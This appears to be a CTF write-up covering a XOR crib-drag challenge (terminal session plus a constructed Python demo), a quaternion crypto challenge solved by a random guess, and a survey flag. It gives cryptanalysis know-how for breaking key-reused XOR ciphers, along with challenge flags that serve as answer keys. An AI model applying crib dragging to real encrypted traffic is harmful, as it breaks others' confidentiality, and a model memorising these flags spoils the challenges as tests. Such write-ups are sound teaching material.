・9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f
・b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c
$ python xorstrings.py 9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c
274c11020943073177525d15380f580d2d64476e1a102b5b0b0641432f17327f724e041742031613

$ python cribdrag.py 274c11020943073177525d15380f580d2d64476e1a102b5b0b0641432f17327f724e041742031613
Your message is currently:
0	________________________________________
Your key is currently:
0	________________________________________
Please enter your crib: flag{
*** 0: "A per"
1: "*}cn8"
2: "wnh$|"
3: "de"`J"
4: "o/fV
        "
5: "%kP)"
6: "a]5&"
7: "W3:n"
8: "><rC"
9: "41t_t"
10: ";yYh#"
*** 11: "sTn?v"
12: "^c9jV"
13: "i4lJ"
14: ">aL<"
15: "kA "
16: "&	a"
17: "+}k"
18: "!{wP"
19: vqL "
20: "||J<p"
21: "vG:l}"
*** 22: "M7ja:"
23: "=gg&8"
24: "mj $T"
25: "`-"Hl"
26: "'/NpI"
27: "%CvU"
28: "I{S	"
29: "q^5"
30: "T)"
31: "/cl"
32: ""ep9"
33: "(hv%x"
34: "b{#dm"
*** 35: "q.bqh"
Enter the correct position, 'none' for no match, or 'end' to quit: 0
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0	A per___________________________________
Your key is currently:
0	flag{___________________________________
Please enter your crib: flag{
*** 0: "A per"
1: "*}cn8"
2: "wnh$|"
3: "de"`J"
4: "o/fV
        "
5: "%kP)"
6: "a]5&"
7: "W3:n"
8: "><rC"
9: "41t_t"
10: ";yYh#"
*** 11: "sTn?v"
12: "^c9jV"
13: "i4lJ"
14: ">aL<"
15: "kA "
16: "&	a"
17: "+}k"
18: "!{wP"
19: vqL "
20: "||J<p"
21: "vG:l}"
*** 22: "M7ja:"
23: "=gg&8"
24: "mj $T"
25: "`-"Hl"
26: "'/NpI"
27: "%CvU"
28: "I{S	"
29: "q^5"
30: "T)"
31: "/cl"
32: ""ep9"
33: "(hv%x"
34: "b{#dm"
*** 35: "q.bqh"
Enter the correct position, 'none' for no match, or 'end' to quit: 9
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	A per____flag{__________________________
Your key is currently:
0	flag{____41t_t__________________________
Please enter your crib: son 
0: "T#""
1: "?~l)"
*** 2: "bmgc"
3: "qf-'"
4: "z,i"
5: "0h_W"
6: "t^r"
7: "B<}"
8: "=35"
9: "!2{"
10: ".zV/"
*** 11: "fWax"
12: "K`6-"
"3: "|7c
14: "+bCD"
15: "~B
g"
16: "^
      )N"
17: "(:"
18: "4t0"
19: "u~
        "
20: "iE{"
21: "cD5+"
22: "X4e&"
23: "(dha"
24: "xi/c"
25: "u.-"
*** 26: "2,A7"
27: "0@y"
28: "\x\_"
29: "d]R"
30: "An"
31: "
      $"
32: "!j7"
33: "=kyb"
34: "wx,#"
35: "d-m6"
*** 36: "1lx3"
Enter the correct position, 'none' for no match, or 'end' to quit: 5
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	A person flag{__________________________
Your key is currently:
0	flag{0h_W41t_t__________________________
Please enter your crib: 0h_W41t_t
0: "$NU=rsn"
1: "|y]^w6E(&"
)" "!jV3
3: "2aPF&a"
4: "9+XfCc)JL"
5: "son flag{"
6: "7Y(i$LP,"
7: "
!	{y"
8: "G:B
        >,RY"
9: "b5Jo;iyr"
10: "m}gXl<Y;3"
11: "%PP9"
12: gZU31n"
13: "?0RzPvEd"
14: "her3s_nO_"
15: "=E;Z+dt/"
16: "
      9.!_"
17: "T/1M$/Tr"
18: "wEGjY5"
19: "^rO|o:r7"
20: "*xt
        ?75["
21: " C\2p7pc"
22: "3TQur[HF"
23: "kcYwcm
             "
24: ";n&F "
25: "6)x#
           -:"
26: "q+p@Np"
27: "sGHeKC:[c"
28: "m(FpH6"
29: "'Z %z5cw"
30: "-0&6\b"
31: "OS#swIg"
Enter the correct position, 'none' for no match, or 'end' to quit: 14
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	A person flag{0h_W41t_t_________________
Your key is currently:
0	flag{0h_W41t_ther3s_nO__________________
Please enter your crib: her3s_nO
0: "O)c1zi~"
1: "$tp:0X_8"
2: "yg{ptn"
3: "jl14B(<"
3Z""a&u
5: "+bCD!{w"
6: "oTa.JV@"
7: "Y nfga"
8: "7/&KP6B"
9: ":8g
       |cb"
10: "5pJ<+RC+"
11: "}]}k~r
"
12: "Pj*>^;)!"
13: "g=U"
14: "0h_W41t_"
15: "eHtE~d"
16: "E5]iOE"
17: "
     ")ct5D"
18: "/
      h#XeI"
19: "b(Th"
20: "ruYhxY/
            "
21: "xN)8u-`"
22: "C>y52AX"
23: "3ntr0py}"
24: "cc3p\H\0"
25: "n$1dm="
26: ")&]$A "
27: "+Je
         - K"
28: "Gr@LjX"
"=[y"W
30: "Z}wH,L"
31: "<7dmY"
32: "+v$1\x\"
Enter the correct position, 'none' for no match, or 'end' to quit: 23
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	A person flag{0h_W41t_ther3s_nO_________
Your key is currently:
0	flag{0h_W41t_ther3s_nO_3ntr0py}_________
flag{0h_W41t_ther3s_nO_3ntr0py}
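The session above is a crib drag over a XOR ciphertext: a guessed fragment (crib) of either the message or the key is slid across every offset, the counterpart bytes are computed as ciphertext XOR crib, and offsets whose counterpart reads as plausible text are kept. Each accepted crib reveals the same span on the other side, which suggests the next crib. The following is an added example that reproduces that loop on constructed data; it is not the challenge's ciphertext and not the cribdrag tool's own code. KEY_PHRASE, MESSAGE, the repeating-key assumption and the CribSession class are all assumptions made for the demonstration. The same logic applies unchanged to two ciphertexts under a reused pad, since c1 XOR c2 equals m1 XOR m2 and one message then plays the role of the key.

```python
"""Crib dragging over a XOR ciphertext (constructed demonstration)."""
from typing import List, Optional, Tuple

# Constructed sample data (assumption): a short message encrypted with a
# repeating, flag-shaped key. The challenge's real ciphertext is not used.
KEY_PHRASE = b"flag{constructed_example}"
MESSAGE = b"A person who reuses a pad leaks its key."
KEY = (KEY_PHRASE * 2)[: len(MESSAGE)]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings up to the shorter length."""
    return bytes(x ^ y for x, y in zip(a, b))


CIPHERTEXT = xor_bytes(MESSAGE, KEY)


def drag_crib(ciphertext: bytes, crib: bytes) -> List[Tuple[int, bytes]]:
    """Slide the crib over every offset. Each entry is what the *other* side
    (key if the crib is message text, message if it is key text) would have
    to contain at that offset."""
    n = len(crib)
    return [(i, xor_bytes(ciphertext[i:i + n], crib))
            for i in range(len(ciphertext) - n + 1)]


def plausible(candidates: List[Tuple[int, bytes]]) -> List[Tuple[int, bytes]]:
    """Keep offsets whose counterpart is entirely printable ASCII; this is the
    filter a human applies when scanning the tool's numbered list."""
    return [(i, frag) for i, frag in candidates
            if all(32 <= b < 127 for b in frag)]


class CribSession:
    """Tracks the partially recovered message and key, mirroring the tool's
    'Your message is currently' / 'Your key is currently' display."""

    def __init__(self, ciphertext: bytes) -> None:
        self.ct = ciphertext
        self.message: List[Optional[int]] = [None] * len(ciphertext)
        self.key: List[Optional[int]] = [None] * len(ciphertext)

    def apply(self, side: str, offset: int, crib: bytes) -> None:
        """Accept a crib at an offset on one side; the other side follows by XOR."""
        if side not in ("message", "key"):
            raise ValueError("side must be 'message' or 'key'")
        if offset < 0 or offset + len(crib) > len(self.ct):
            raise ValueError("crib does not fit at that offset")
        known = self.message if side == "message" else self.key
        other = self.key if side == "message" else self.message
        for i, b in enumerate(crib):
            known[offset + i] = b
            other[offset + i] = self.ct[offset + i] ^ b

    def extend_repeating_key(self, period: int) -> None:
        """If the key is assumed to repeat with this period, propagate every
        recovered key byte to all positions congruent to it modulo the period."""
        for i, b in enumerate(self.key):
            if b is None:
                continue
            for j in range(i % period, len(self.key), period):
                if self.key[j] is None:
                    self.key[j] = b
                    self.message[j] = self.ct[j] ^ b

    @staticmethod
    def _render(buf: List[Optional[int]]) -> str:
        # '_' marks unknown bytes, '.' marks known but non-printable ones.
        return "".join("_" if b is None else (chr(b) if 32 <= b < 127 else ".")
                       for b in buf)

    def render_message(self) -> str:
        return self._render(self.message)

    def render_key(self) -> str:
        return self._render(self.key)


def demo() -> Tuple[str, str]:
    """Walk through the same kind of steps as the session above and return the
    recovered (message, key) strings."""
    s = CribSession(CIPHERTEXT)
    s.apply("key", 0, b"flag{")                  # message now starts "A per"
    s.apply("message", 5, b"son ")               # key now starts "flag{cons"
    s.apply("message", 9, b"who reuses a pad")   # key[9:25] -> "tructed_example}"
    s.extend_repeating_key(len(KEY_PHRASE))      # assumption: key repeats
    return s.render_message(), s.render_key()


if __name__ == "__main__":
    for off, frag in plausible(drag_crib(CIPHERTEXT, b"flag{")):
        print(f"{off}: {frag!r}")
    msg, key = demo()
    print("message:", msg)
    print("key:    ", key)
```

The plausibility filter only removes offsets that cannot be text; several false positives usually survive it, so the person driving the drag still picks the offset whose counterpart reads as a sensible continuation, exactly as the transcript above shows with the `***` marked candidates.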

quaternion-revenge (crypto)

$ nc mc.ax 31868
n: 109407261225601290979646993307199045582771989091617528040453388668527729655364021294073786236928010288425931170033882500008141737282348381080859938184708804261036670840857901348501188283821065103049160013518150182035783438575945282872216684014487995809554297629331427519782755136732060248945297800684475538669
l: 1024
c1: 8004256688474344817870233833875940222941935887236015063020756596204632736684872367826070568041179498012108632998282142428784927079034900107638096754487286
c2: 4072287980754638763334170410426881140079193675181120657395601634493823175738330991693959371966799518587104964948856594595459994325207179456447135423397260
Calculate the left quaternion isomorphism of m:
>>> 

Try something at random.

$ nc mc.ax 31868
n: 86130025636062055956513705083930642167992989060850106586281533247785660295367892438990867856454597008437399796578554368813552223751092749003124747057080792118304583487867234267309926248815120163138042117181301840830034157223307134822520786058567011588349160660968369137756745079514802619272300098374308411299
l: 1023
c1: 9593237318463895403485245835019899101341699250286125466299423268449833221079568272438381700968557138900898253166344975020822465215214852631020599973244033
c2: 4265549705909481277885344297128796851846735962116752700305188804452208934636515673843776196495539597068674270572889618802045156010757400818748543749630735
Calculate the left quaternion isomorphism of m:
>>> i+j
flag{00p5_1_l13d_r0fl}

The flag was displayed. It is also displayed for i*j, but I can't give a theoretical explanation.

flag{00p5_1_l13d_r0fl}

survey (misc)

After answering the survey, the following URL was displayed.

https://static.redpwn.net/content/survey-i9cbpsiv2d6x3zz9.txt

Accessing it displayed the flag.

flag{thank5_f0r_play1ng_r3dpwnctf_2021!_zc9e848yg2gdhwxz}